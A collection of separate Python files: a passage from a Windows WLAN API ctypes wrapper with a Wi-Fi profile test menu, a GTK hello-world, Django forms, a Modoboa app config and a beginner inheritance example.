print 'getWlanReasonCodeString() fail - err %s' % err
rcStr = '**'
return rcStr
WLAN_NOTIFICATION_SOURCE_NONE = 0
WLAN_NOTIFICATION_SOURCE_ONEX = 0x00000004
WLAN_NOTIFICATION_SOURCE_ACM = 0x00000008
WLAN_NOTIFICATION_SOURCE_MSM = 0x00000010
WLAN_NOTIFICATION_SOURCE_SECURITY = 0x00000020
WLAN_NOTIFICATION_SOURCE_IHV = 0x00000040
WLAN_NOTIFICATION_SOURCE_HNWK = 0x00000080
WLAN_NOTIFICATION_SOURCE_ALL = 0x0000FFFF
class WLAN_NOTIFICATION_DATA(Structure):
"""
typedef struct _WLAN_NOTIFICATION_DATA {
DWORD NotificationSource;
DWORD NotificationCode;
GUID InterfaceGuid;
DWORD dwDataSize;
PVOID pData;
} WLAN_NOTIFICATION_DATA, *PWLAN_NOTIFICATION_DATA;
"""
_fields_ = [
("NotificationSource", DWORD),
("NotificationCode", DWORD),
("InterfaceGuid", GUID),
("dwDataSize", DWORD),
("pData", BYTE * 1),
]
def __str__(self):
        return 'source:0x%X code:%s InterfaceGuid:%s dwDataSize:%s' % (self.NotificationSource, self.NotificationCode, self.InterfaceGuid, self.dwDataSize)
#DWORD WINAPI WlanRegisterNotification(
#_In_ HANDLE hClientHandle,
#_In_ DWORD dwNotifSource,
#_In_ BOOL bIgnoreDuplicate,
#_In_opt_ WLAN_NOTIFICATION_CALLBACK funcCallback,
#_In_opt_ PVOID pCallbackContext,
#_Reserved_ PVOID pReserved,
#_Out_opt_ PDWORD pdwPrevNotifSource
#);
NOTIFY_FUNC = CFUNCTYPE(c_voidp, POINTER(WLAN_NOTIFICATION_DATA), POINTER(c_int))
#NOTIFY_FUNC = WINFUNCTYPE(c_voidp, POINTER(WLAN_NOTIFICATION_DATA), POINTER(c_int))
WlanRegisterNotification=wlanapi.WlanRegisterNotification
WlanRegisterNotification.restype = DWORD
WlanRegisterNotification.argtypes = (HANDLE,
DWORD,
c_bool,
NOTIFY_FUNC,
c_void_p,
c_void_p,
POINTER(DWORD))
def wlanNotificationCallback(pData, pVoid):
""" Wlan notification callback """
msg1 = 'wlanNotificationCallback() pData:%s' % pData.contents
#msg2 = 'wlanNotificationCallback() pVoid:%s' % pVoid.contents
log.info( msg1 )
#log.info( msg2 )
print msg1
#print msg2
class WlanMemory(object):
""" Base class used when the wlanapi returns data that needs to be deleted with WlanFreeMemory()
__enter__ and __exit__ have been implemented so that the with statement can be used to
automatically free the memory.
the delete() method will also delete the memory used.
"""
def __init__(self, pData):
self._pData = pData
log.debug('WlanMemory __init__() - pData:%s' % self._pData)
def delete(self):
if self._pData:
log.debug('WlanMemory delete() - pData:%s' % self._pData)
WlanFreeMemory(self._pData)
self._pData = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.delete()
def _custom_resize(self, array, new_size):
return (array._type_*new_size).from_address(addressof(array))
class WlanInterfaceInfoData(WlanMemory):
def __init__(self, pData):
WlanMemory.__init__(self, pData)
self.ifaces = self._custom_resize( self._pData.contents.InterfaceInfo,
self._pData.contents.NumberOfItems)
def __len__(self):
return len(self.ifaces)
def __getitem__(self, key):
return self.ifaces[key]
def getInterface(self, miniDesc):
""" return an interface using miniDesc name """
for iface in self.ifaces:
if iface.miniDesc() == miniDesc:
return iface
else:
raise Exception('Interface with miniDesc "%s" not found' % miniDesc)
def __iter__(self):
return iter(self.ifaces)
class WlanAvailableNetworkListData(WlanMemory):
def __init__(self, pData):
WlanMemory.__init__(self, pData)
avail_net_list = self._pData.contents
self.networks = self._custom_resize( avail_net_list.Network, avail_net_list.NumberOfItems)
def __len__(self):
return len(self.networks)
def __getitem__(self, key):
return self.networks[key]
def getProfile(self, profile):
""" return network with profile name """
for network in self.networks:
if network.getProfileName() == profile:
return network
else:
raise Exception('Network with profile name "%s" not found' % profile)
def getSSID(self, ssid):
""" return network using ssid """
for network in self.networks:
            if str(network.getSSID()) == ssid:
                return network
        else:
            raise Exception('Network with SSID "%s" not found' % ssid)
def __iter__(self):
return iter(self.networks)
class WlanInterface(object):
""" wraps the wlanapi for all wlan operations
Some wlanapi commands return memory that needs to be deleted with a call to WlanFreeMemory()
enumInterfaces(), getAvailableNetworks()
The wlan memory used will always be return in a class inherited from WlanMemory
Use the python 'with' statement to scope the usage and then the memory is free'd automatically
"""
def __init__(self, openHandle=True, useCallback=False):
self._useCallback = useCallback
self._handle = None
self._lstIfaces = None
self._prevSources = 0
self._funcCallback = None
if openHandle:
self.openHandle()
def openHandle(self):
""" open handle to Wlan """
NegotiatedVersion = DWORD()
self._handle = HANDLE()
log.debug('WlanOpenHandle()')
ret = WlanOpenHandle(1, None, byref(NegotiatedVersion), byref(self._handle))
if ret != ERROR_SUCCESS:
raise WinError(ret)
if self._useCallback:
self.createNotificationCallback(sources=WLAN_NOTIFICATION_SOURCE_ALL)
def updateDesc(self, wlanIfData=None):
""" update the description string """
if wlanIfData:
self._lstIfaces = [str(iface) for iface in wlanIfData.ifaces]
else:
with self.enumInterfaces() as wlanIfData:
self._lstIfaces = [str(iface) for iface in wlanIfData.ifaces]
def close(self):
# free all memory used and close handle
if self._handle is not None:
if self._funcCallback is not None:
self.createNotificationCallback(clearAll=True)
log.debug('WlanCloseHandle() handle:%s' % self._handle)
ret = WlanCloseHandle(self._handle, None )
if ret != ERROR_SUCCESS:
raise WinError(ret)
self._handle = None
def createNotificationCallback(self, sources=WLAN_NOTIFICATION_SOURCE_ALL, ignoreDups=False, clearAll=False):
log.debug('createNotificationCallback() - sources:0x%X ignoreDups:%s clearAll:%s' % (sources,ignoreDups,clearAll))
if clearAll:
dwNotifySource = DWORD( WLAN_NOTIFICATION_SOURCE_NONE )
#funcCallback = None
self._funcCallback = NOTIFY_FUNC(wlanNotificationCallback)
pCallbackContext = POINTER(c_int)()
else:
dwNotifySource = DWORD( sources )
self._funcCallback = NOTIFY_FUNC(wlanNotificationCallback)
pCallbackContext = POINTER(c_int)()
bIgnoreDups = BOOL(ignoreDups)
dwPrevSources = DWORD(self._prevSources)
ret = WlanRegisterNotification(self._handle,
dwNotifySource,
bIgnoreDups,
self._funcCallback,
pCallbackContext,
None,
byref(dwPrevSources))
if ret != ERROR_SUCCESS:
raise WindowsError(ret)
self._prevSources = sources
if clearAll:
self._funcCallback = None
def enumInterfaces(self):
# free interface memory if already allocated
log.debug('WlanInterface enumInterfaces()')
# find all wireless network interfaces
_pInterfaceList = pointer(WLAN_INTERFACE_INFO_LIST())
ret = WlanEnumInterfaces(self._handle, None, byref(_pInterfaceList))
if ret != ERROR_SUCCESS:
raise WinError(ret)
# return to caller
return WlanInterfaceInfoData(_pInterfaceList)
def getAvailableNetworks(self, iface):
log.debug('WlanInterface getAvailableNetworks()')
dwFlags = DWORD(3)
_pAvailableNetworkList = pointer(WLAN_AVAILABLE_NETWORK_LIST())
ret = WlanGetAvailableNetworkList( self._handle,
byref(iface.InterfaceGuid),
dwFlags,
None,
byref(_pAvailableNetworkList))
if ret != ERROR_SUCCESS:
raise WinError(ret)
return WlanAvailableNetworkListData(_pAvailableNetworkList)
def wlanConnect(self, iface, profile):
""" connect a wlan interface using a profile """
log.debug('WlanInterface wlanConnect() - iface:%s profile:"%s"' % (iface.miniDesc(), profile))
wcp = WLAN_CONNECTION_PARAMETERS()
        # attribute names must match WLAN_CONNECTION_PARAMETERS._fields_;
        # anything else is silently stored as a plain Python attribute
        wcp.wlanConnectionMode = wlan_connection_mode_profile
        wcp.strProfile = profile
        wcp.dot11Ssid = None  # byref(ssid)
        wcp.desiredBssidList = None
        wcp.dot11BssType = 1  # dot11_BSS_type_infrastructure
        wcp.Flags = 0
ret = WlanConnect( self._handle,
byref(iface.InterfaceGuid),
byref(wcp),
None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanDisconnect(self, iface):
""" disconnect a wlan interface """
log.debug('WlanInterface wlanDisconnect() - iface:%s' % (iface.miniDesc()))
ret = WlanDisconnect( self._handle,
byref(iface.InterfaceGuid),
None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanGetProfile(self, iface, profile, saveToFile=None):
""" return profile XML for a defined profile """
log.debug('WlanInterface wlanGetProfile() - profile:"%s" saveToFile:%s' % (profile,saveToFile))
sProfile = c_wchar_p(profile)
sProfileXML = c_wchar_p() # create_unicode_buffer(1024)
flags = DWORD(0)
grantedAccess = DWORD()
ret = WlanGetProfile( self._handle,
byref(iface.InterfaceGuid),
sProfile,
None,
byref(sProfileXML),
byref(flags),
byref(grantedAccess))
if ret != ERROR_SUCCESS:
raise WinError(ret)
profileXML = sProfileXML.value
if saveToFile:
open(saveToFile,'w').write(profileXML)
return profileXML
def wlanSetProfile(self, iface, profileXML, overwrite=True):
""" return profile XML for a defined profile """
log.debug('WlanInterface wlanSetProfile()')
flags = DWORD(0)
sProfileXML = c_wchar_p(profileXML)
dwReasonCode = DWORD()
bOverwrite = BOOL(overwrite)
ret = WlanSetProfile( self._handle,
byref(iface.InterfaceGuid),
flags,
sProfileXML,
None,
bOverwrite,
None,
byref(dwReasonCode))
log.debug('wlanSetProfile() reasonCode:%s' % getWlanReasonCodeString( dwReasonCode ))
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanCopyProfile(self, iface, profile, newProfile, ssid=None, pass_phrase=None, saveOrigProfile=None, saveNewProfile=None):
""" Create a new profile from an existing profile
Changes in the new profile:
change the profile name in <WLANProfile>
remove the hex element in <SSID>
if ssid argument is set:
change the name element in <SSID> to new SSID name
if pass_phrase argument is set:
change the protected element from true to false in <sharedKey>
change the keyMaterial element to the new pass phrase in <sharedKey>
"""
sXML = self.wlanGetProfile(iface, profile, saveToFile=saveOrigProfile)
#print sXML
reProf = re.compile('<{0}>.*</{0}>'.format('name'))
reProf2 = re.compile('<{0}>.*</{0}>'.format('name2'))
reHex = re.compile('<{0}>.*</{0}>'.format('hex'))
reProt = re.compile('<{0}>.*</{0}>'.format('protected'))
reKeyM = re.compile('<{0}>.*</{0}>'.format('keyMaterial'))
sNewXML = sXML
# change the name of the profile
sNewXML = reProf.sub('<{0}>{1}</{0}>'.format( 'name2',newProfile), sNewXML, 1)
# remove the hex element in <SSID>
sNewXML = reHex.sub('', sNewXML, 1)
if ssid is not None:
# change the name element in <SSID> to new SSID name
sNewXML = reProf.sub('<{0}>{1}</{0}>'.format( 'name',ssid), sNewXML, 1)
if pass_phrase is not None:
# change the protected element from true to false in <sharedKey>
sNewXML = reProt.sub('<{0}>{1}</{0}>'.format( 'protected','false'), sNewXML, 1)
# change the keyMaterial element to the new pass phrase in <sharedKey>
sNewXML = reKeyM.sub('<{0}>{1}</{0}>'.format( 'keyMaterial', pass_phrase), sNewXML, 1)
# rename <name2> back to <name>
sNewXML = reProf2.sub('<{0}>{1}</{0}>'.format( 'name',newProfile), sNewXML, 1)
#print sNewXML
if saveNewProfile is not None:
open(saveNewProfile,'w').write(sNewXML)
# set the new profile
self.wlanSetProfile(iface, sNewXML)
def wlanDeleteProfile(self, iface, profile):
""" Delete a profile """
log.debug('WlanInterface wlanDeleteProfile() - profile:"%s"' % profile)
sProfile = c_wchar_p(profile)
ret = WlanDeleteProfile( self._handle,
byref(iface.InterfaceGuid),
sProfile,
None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanScan(self, iface):
""" Requests that the native 802.11 Wireless LAN driver scan for available wireless networks. """
log.debug('WlanInterface wlanScan()')
ret = WlanScan( self._handle,
byref(iface.InterfaceGuid),
None,None,None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def __str__(self):
if self._handle is None:
return 'Not open'
        if self._lstIfaces:
            s = '%d interfaces : %s' % (len(self._lstIfaces), ','.join(self._lstIfaces))
        else:
            s = 'no interfaces'
if self._funcCallback is not None:
s += ' callback'
return s
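# A minimal usage sketch (not part of the original module) showing the intended
# 'with' pattern: enumerate interfaces, request a scan and list visible networks.
# Note that wlanScan() only requests a scan; results may take a moment to appear.
def example_list_networks():
    wlan = WlanInterface()
    try:
        with wlan.enumInterfaces() as wlanIfData:
            for iface in wlanIfData:
                wlan.wlanScan(iface)
                with wlan.getAvailableNetworks(iface) as wlanNetData:
                    for nw in wlanNetData:
                        print '%-30s %3d%%' % (nw.getSSID(), nw.getSignalQuality())
    finally:
        wlan.close()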
def show_wifi_interfaces():
""" test function """
log.debug('show_wifi_interfaces')
NegotiatedVersion = DWORD()
ClientHandle = HANDLE()
ret = WlanOpenHandle(1, None, byref(NegotiatedVersion), byref(ClientHandle))
if ret != ERROR_SUCCESS:
raise WinError(ret)
try:
# find all wireless network interfaces
pInterfaceList = pointer(WLAN_INTERFACE_INFO_LIST())
ret = WlanEnumInterfaces(ClientHandle, None, byref(pInterfaceList))
if ret != ERROR_SUCCESS:
raise WinError(ret)
try:
ifaces = customresize(pInterfaceList.contents.InterfaceInfo,
pInterfaceList.contents.NumberOfItems)
# find each available network for each interface
for iface in ifaces:
print "\nInterface: %s %s\n" % (iface.strInterfaceDescription, iface.isState)
pAvailableNetworkList = pointer(WLAN_AVAILABLE_NETWORK_LIST())
ret = WlanGetAvailableNetworkList(ClientHandle,
byref(iface.InterfaceGuid),
0,
None,
byref(pAvailableNetworkList))
if ret != ERROR_SUCCESS:
# raise WinError(ret)
raise WindowsError(ret)
try:
print '%-30s %-4s %s' % ('SSID','Qual','C:Connectable S:Secure P:Profile')
print '%-30s %-4s' % ('====','====')
avail_net_list = pAvailableNetworkList.contents
networks = customresize( avail_net_list.Network, avail_net_list.NumberOfItems)
for network in networks:
ssid = network.dot11Ssid.SSID[:network.dot11Ssid.SSIDLength]
sigQual = network.wlanSignalQuality
sConn = ' '
sDesc = ''
if network.NetworkConnectable:
sDesc += 'C'
if network.SecurityEnabled:
sDesc += 'S'
if network.Flags & WLAN_AVAILABLE_NETWORK_CONNECTED:
sConn = '*'
if network.Flags & WLAN_AVAILABLE_NETWORK_HAS_PROFILE:
sDesc += 'P'
print "%-30s %3d%% %s %s" % ( ssid, sigQual, sConn, sDesc)
finally:
WlanFreeMemory(pAvailableNetworkList)
finally:
WlanFreeMemory(pInterfaceList)
finally:
WlanCloseHandle( ClientHandle, None)
from menu import MenuItem, Menu, InputException
xmlTemplate = """
<?xml version="1.0">
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>$PROFILE_NAME$</name>
<SSIDConfig>
<SSID>
<name>$SSID$</name>
</SSID>
<nonBroadcast>false</nonBroadcast>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>manual</connectionMode>
<autoSwitch>false</autoSwitch>
<MSM>
<security>
<authEncryption>
<authentication>WPA2PSK</authentication>
<encryption>AES</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>$PASS_PHRASE$</keyMaterial>
</sharedKey>
</security>
</MSM>
</WLANProfile>
"""
uniXmlTemplate = unicode(xmlTemplate)
class WifiMenu(Menu):
_dctSources = { 'all' : WLAN_NOTIFICATION_SOURCE_ALL,
'acm' : WLAN_NOTIFICATION_SOURCE_ACM,
'hnwk' : WLAN_NOTIFICATION_SOURCE_HNWK,
'ihv' : WLAN_NOTIFICATION_SOURCE_IHV,
'msm' : WLAN_NOTIFICATION_SOURCE_MSM,
'onex' : WLAN_NOTIFICATION_SOURCE_ONEX,
'sec' : WLAN_NOTIFICATION_SOURCE_SECURITY,
}
_sources = '|'.join(_dctSources.keys())
def __init__(self, useCallback=False, cmdFile=None):
Menu.__init__(self, cmdFile, menuSize=80 )
self.wlan = WlanInterface(useCallback=useCallback)
self.wlan.updateDesc()
# add menu items
self.addMenuItem( MenuItem( 'si', '', 'Show interfaces' , self._showInterfaces) )
self.addMenuItem( MenuItem( 'il', '<networks|n>', 'run enumInterfaces() and list' , self._ifList) )
self.addMenuItem( MenuItem( 'co', 'profile <if=name> <iface=index>', 'Connect to a network' , self._ifConnect) )
self.addMenuItem( MenuItem( 'di', '<if=name> <iface=index>', 'Disconnect from a network' , self._ifDisconnect) )
self.addMenuItem( MenuItem( 'gp', 'profile <if=name> <iface=index>', 'Get Profile' , self._ifGetProfile) )
self.addMenuItem( MenuItem( 'sp', 'profile <ssid=value> <pp=value> <if=name> <iface=index>', 'Set Profile' , self._ifSetProfile) )
self.addMenuItem( MenuItem( 'cp', 'profile new_profile <if=name> <iface=index> <ssid=ssid> <pp=pass_phrase>', 'Copy Profile' , self._ifCopyProfile) )
self.addMenuItem( MenuItem( 'dp', 'profile <if=name> <iface=index>', 'Delete a Profile' , self._ifDeleteProfile) )
self.addMenuItem( MenuItem( 'is', '<if=name> <iface=index>', 'Scan an interface' , self._ifScan) )
self.addMenuItem( MenuItem( 'cn', '<source=%s> <ignoreDups> <clear>' % WifiMenu._sources, 'Register/Deregister the notification callback' , self._ifRegNotify) )
self.updateHeader()
def shutdown(self):
self.wlan.close()
def updateHeader(self):
self.header = 'wlan: %s' % self.wlan
def _showInterfaces(self):
show_wifi_interfaces()
def _ifList(self):
""" list all interfaces available """
bNetworks = False
for cmd in self.lstCmd[1:]:
if cmd == 'networks' or cmd == 'n':
bNetworks = True
print 'enum interfaces ...'
with self.wlan.enumInterfaces() as wlanIfData:
# find each available network for each interface
# for n,iface in enumerate(wlanIfData.ifaces):
for n,iface in enumerate(wlanIfData):
print "%d : %-40s state:%s" % (n,iface.strInterfaceDescription, iface.getState())
if bNetworks:
with self.wlan.getAvailableNetworks(iface) as wlanNetData:
print ' %-15s %-30s %-15s %s' % ('Profile', 'SSID','Qual (dbm)','C:Connectable S:Secure P:Profile')
print ' %-15s %-30s %-15s' % ('=======', '====','==========')
for nw in wlanNetData:
sConn = ' '
sDesc = ''
if nw.isConnectable():
sDesc += 'C'
if nw.isSecure():
sDesc += 'S'
if nw.isConnected():
sConn = '*'
if nw.hasProfile():
sDesc += 'P'
print ' %-15s %-30s %3d%% %.1f %s %s' % (nw.getProfileName(), nw.getSSID(), nw.getSignalQuality(), nw.getSignalQualityInDBM(), sConn, sDesc)
def _ifConnect(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanConnect(iface, profile)
def _ifDisconnect(self):
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[1:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanDisconnect(iface)
def _ifGetProfile(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
saveToFile = profile + '.prof'
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
sXML = self.wlan.wlanGetProfile(iface, profile, saveToFile)
log.debug(sXML)
hexDump(sXML, msg='Get', logFunc=log.debug)
xml = open(saveToFile,'r').read()
print xml
def _ifCopyProfile(self):
if len(self.lstCmd) < 3:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
newProfile = self.lstCmd[2]
ssid = None
pass_phrase = 'mimosanetworks'
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
elif lst[0] == 'ssid' and len(lst) == 2:
ssid = lst[1]
elif lst[0] == 'pp' and len(lst) == 2:
pass_phrase = lst[1]
saveOrigProfile = profile + '.prof'
saveNewProfile = newProfile + '.prof'
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanCopyProfile(iface, profile, newProfile, ssid=ssid, pass_phrase=pass_phrase,
saveNewProfile=saveNewProfile, saveOrigProfile=saveOrigProfile)
def _ifSetProfile(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
passPhrase = 'mimosanetworks'
ssid = 'mimosaM016'
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
elif lst[0] == 'ssid' and len(lst) == 2:
ssid = lst[1]
elif lst[0] == 'pp' and len(lst) == 2:
passPhrase = lst[1]
# get profile XML from template string
proXML = uniXmlTemplate
proXML = proXML.replace('$PROFILE_NAME$', profile)
proXML = proXML.replace('$SSID$', ssid)
proXML = proXML.replace('$PASS_PHRASE$', passPhrase)
print proXML
hexDump( proXML, msg='Set', logFunc=log.debug)
#print x
# get profile XML from interface
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanSetProfile(iface, proXML)
def _ifDeleteProfile(self):
if len(self.lstCmd) < 2:
raise InputException( 'Not enough arguments for %s command' % self.lstCmd[0] )
profile = self.lstCmd[1]
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanDeleteProfile(iface, profile)
def _ifScan(self):
ifaceIndex = 0
ifaceName = None
for cmd in self.lstCmd[2:]:
lst = cmd.split('=')
if lst[0] == 'iface' and len(lst) == 2:
ifaceIndex = int(lst[1])
elif lst[0] == 'if' and len(lst) == 2:
ifaceName = lst[1]
with self.wlan.enumInterfaces() as wlanIfData:
if ifaceName:
iface = wlanIfData.getInterface(ifaceName)
else:
iface = wlanIfData[ifaceIndex]
self.wlan.wlanScan(iface)
def _ifRegNotify(self):
""" cn <source=value> <ignoreDups> <clear> """
source = WLAN_NOTIFICATION_SOURCE_ALL
ignoreDups = False
clear = False
for cmd in self.lstCmd[1:]:
lst = cmd.split('=')
if lst[0] == 'source' and len(lst) == 2:
lst = lst[1].split('|')
source = 0
for src in lst:
                    if src in self._dctSources:
                        source |= self._dctSources[src]
                    else:
                        raise Exception('source type "%s" not supported' % src)
elif lst[0] == 'ignoreDups':
ignoreDups = True
elif lst[0] == 'clear':
clear = True
self.wlan.createNotificationCallback(sources=source, ignoreDups=ignoreDups, clearAll=clear)
if __name__ == '__main__':
import logging
from optparse import OptionParser
TLLog.config( 'wlan_test.log', defLogLevel=logging.INFO )
DEFAULT_LOG_ENABLE = 'wlan'
# build the command line arguments
parser = OptionParser()
parser.add_option( "-m", "--logEnable", dest="lstLogEnable", default=DEFAULT_LOG_ENABLE,
help='Comma separated list of log modules to enable, * for all. Default is "%s"' % DEFAULT_LOG_ENABLE)
parser.add_option( '', "--useCallback", dest="useCallback", action="store_true", default=False,
help='Enable usage of the Wlan callback notifications. Default is do not use')
# parse the command line and set values
(options, args) = parser.parse_args()
# makes Control-break behave the same as Control-C on windows
import signal
signal.signal( signal.SIGBREAK, signal.default_int_handler )
try:
log.info( '=================================' )
log.info( 'wlan_test starting' )
# update log options
logOptions(options.lstLogEnable)
menu = WifiMenu(useCallback=options.useCallback)
menu.runMenu()
finally:
log.info( 'wlan_test exiting' )
|
# All copyrights and related or neighbouring rights waived under CC0.
# http://creativecommons.org/publicdomain/zero/1.0/
# To the extent possible under law, Andrew Chadwick has waived all
# copyright and related or neighboring rights to this program. This
# program is published from: United Kingdom.
"""Fairly minimal GTK3 and Cairo Hello World."""
import math
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
import cairo
def main():
t = Gtk.Label(
label = "Hello, GTK!",
hexpand = True,
vexpand = False,
)
d = Gtk.DrawingArea(
hexpand = True,
vexpand = True,
)
d.set_size_request(300, 250)
d.connect("draw", draw_cb)
g = Gtk.Grid(
row_spacing = 12,
column_spacing = 12,
border_width = 18,
)
g.attach(d, 0, 0, 1, 1)
g.attach(t, 0, 1, 1, 1)
w = Gtk.Window(
title = "hello",
)
w.set_default_size(400, 300)
w.add(g)
w.connect("destroy", Gtk.main_quit)
w.show_all()
Gtk.main()
def draw_cb(da, cr):
cr.set_source_rgb(0.3, 0.3, 0.4)
cr.paint()
cr.set_line_width(10)
w = da.get_allocated_width()
h = da.get_allocated_height()
cr.arc(w/2.0, h/2.0, min(w, h)/2.0 - 20, 0, 2*math.pi)
cr.set_source_rgb(0.8, 0.7, 0.2)
cr.stroke()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from gui.models import News,Report
from django.utils.translation import gettext as _
class NewsForm(forms.ModelForm):
class Meta:
model = News
fields = ('title', 'imagen', 'resumen','content',)
labels = {
'title': _('Título'),
}
error_messages = {
'title': {
'required': _("El campo 'Título' es requerido"),
},
'imagen': {
'required': _("Una 'Imagen' es requerida"),
},
'resumen': {
'required': _("El campo 'Resumen' es requerido"),
},
'content': {
'required': _("El campo 'Contenido' es requerido"),
},
}
class ReportForm(forms.ModelForm):
class Meta:
model = Report
fields = ('title', 'fileReport',)
error_messages = {
'title': {
'required': _("El campo 'Título' es requerido"),
},
'fileReport': {
'required': _("Un 'Documento' es requerido"),
},
}
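# The News and Report models live in gui.models and are not shown here; a
# hypothetical sketch of the fields these ModelForms expect (the real models
# may differ):
#
# class News(models.Model):
#     title = models.CharField(max_length=200)
#     imagen = models.ImageField(upload_to='news/')
#     resumen = models.TextField()
#     content = models.TextField()
#
# class Report(models.Model):
#     title = models.CharField(max_length=200)
#     fileReport = models.FileField(upload_to='reports/')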
|
"""App config for limits."""
from django.apps import AppConfig
from django.utils.translation import gettext as _
def load_limits_settings():
"""Load settings."""
from modoboa.parameters import tools as param_tools
from . import app_settings
from .api.v2 import serializers
param_tools.registry.add("global", app_settings.ParametersForm, _("Limits"))
param_tools.registry.add2(
"global", "limits", _("Limits"), app_settings.GLOBAL_PARAMETERS_STRUCT,
serializers.LimitsGlobalParemetersSerializer
)
class LimitsConfig(AppConfig):
"""App configuration."""
name = "modoboa.limits"
verbose_name = "Modoboa admin limits"
def ready(self):
load_limits_settings()
from . import handlers # NOQA:F401
|
## Santosh Khadka
class Animal():
def __init__(self):
print("Animal created")
def who_am_i(self):
print("I am an animal")
def eat(self):
print("I am eating")
class Dog(Animal): # inherits from the Animal(base class) class. Dog derives from Animal class
def __init__(self):
Animal.__init__(self)
print("Dog created")
def who_am_i(self):
print("I am a dog!")
Budd = Dog()
Budd.eat() # inherited from the Animal class even though Dog doesn't define eat()
Budd.who_am_i() # base class method overridden by Dog
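# The same Dog class written with the more idiomatic super() call instead of
# naming the base class explicitly (behaviour is identical here):
class Dog2(Animal):
    def __init__(self):
        super().__init__()  # equivalent to Animal.__init__(self) above
        print("Dog created")

    def who_am_i(self):
        print("I am a dog!")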
|